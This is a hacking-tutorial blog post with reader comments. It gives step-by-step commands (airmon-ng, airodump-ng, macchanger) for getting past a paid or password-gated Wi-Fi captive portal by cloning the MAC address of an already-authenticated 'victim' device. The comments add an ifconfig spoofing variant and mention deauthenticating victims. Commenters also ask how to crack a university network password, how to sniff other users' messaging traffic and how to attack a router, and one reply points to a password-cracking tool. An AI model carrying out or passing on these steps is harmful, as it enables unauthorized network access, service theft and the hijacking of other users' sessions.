Have you ever been away from home or on holiday and noticed an open network connection? FREE INTERNET! But then you find out that every search or page redirects you to an "enter password" or "signup here" page. Well, there are ways around this.
In this article, I'll show you how to bypass a local network proxy.
On a simple networking system, users would connect, enter passwords, get a local IP, and be able to connect to the internet through the proxy. But how does the machine know which computer is what? This is the key—the MAC address. The network logs the MAC address of the authenticated device and allows connectivity until either timeout or until they sign out.
The Exploit
To complete this exploitation, you'll need a Linux distro with networking and injection drivers, Aircrack-ng, and a program called Macchanger.
1) Open up Terminal and throw your card into monitor mode:
airmon-ng start wlan0 (or whatever your card's name is)
2) Now, start airodump-ng and observe the devices connected to your victim network:
airodump-ng mon0
3) Note your victim's network MAC address (or BSSID). Then, on the device list in airodump-ng, check out what the MAC addresses of the connected devices (to your network) are. Look for one with a lot of packet "acceptance" and "power" (meaning it's close by), and select and copy the MAC address of the device (NOT the access point BSSID). If you're confused, take a look at the photo below:
4) Disable all interfaces with:
ifconfig wlan0 down and airmon-ng stop mon0
5) Finally, fake the MAC address of the device you chose:
macchanger -m XX:XX:XX:XX:XX (the victim's MAC) wlan0
6) Start up Wicd or similar tool and connect to your victim's network. If all goes well, you should have internet access!
Warnings
- Hacking is illegal! This is for educational purposes only.
- I am not responsible for any damage, harm or legal trouble you get yourself into.
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
11 Comments
Nice article, but you dont even need to use macchanger, all you have to do is "ifconfig wlan0 down && ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX (Vic's MAC) && ifconfig wlan0 up" I figured this out when I was trying to use my CR48 at my school as they do a mac filter to block all other people from accessing the network, the one downside to mac spoofing is that the person doing it will get tons of lag if they are using the net the same time someone else is.
yup! Personally i prefer macchanger, but ifconfig does the same thing. Also, its quite easy to deassociate the victim computer! but yeah, there is lots of lag if they're using the bandwidth. Its scary though how easy it is to get past these things.
Or if your in windows you can use a program called Cain and Abel to do a network sniff and grab the macs from there and switch the mac in windows
Are you guys recommending using the MAC of another logged-in end user and doing a "double-log-in"? Maybe you can use the MAC from the access point itself to log into the service provider and get the full bandwidth available to the access point? Just a thought...
I would recommend getting the MAC from someone on the network and not taking the access point's MAC as it can cause conflict. But be advised that when people do search for a problem on the network they often look for cloned MACs.
I got a question if anybody you all terrorists answer it I didn't read any of the other blogs so I really don't know what happens if a person with that IP address in that MAC address try to go sign on to the same server you're trying to sign on to?
in my university wifi is password protected and it is used with a proxy 172.16.0.2 so can you tell me how to crack this password with any tool or software.
Sahil:
Check on my articles on password cracking especially on using THC-Hydra.
OTW
I got a wifi network nesr my house which uses mikrotik routeros and has a login screen. I knew the password and so i could log in. But now when i connect to that wifi the login screen wont come up by itself. And when i go to the login page manually by entering url of that login page,i can login using same username and password but not able to access internet. So what has happened actually?? How can i access internet. Pleade reply.
Does your device show up in the list of connected devices on the router?
Hey Guys
there's a big dormitory across the street I live in, with a bunch of open APs. You can connect to them but you need to enter the valid username and password on mikrotik login page to acces to the internet. Here are my Questions:
1st. how can I access to the free internet?
2nd. how can I see the data transfered in the network? I've tried wireshark but I guess all datas are encrypted, cause I can't see anything legible there.
3rd. by some kali apps you just can see what they're doing in their browsers. Is there a way to see datas sent by their phone messangers like whatssapp or telegram?
4th. how can I attack the router itself?
Share Your Thoughts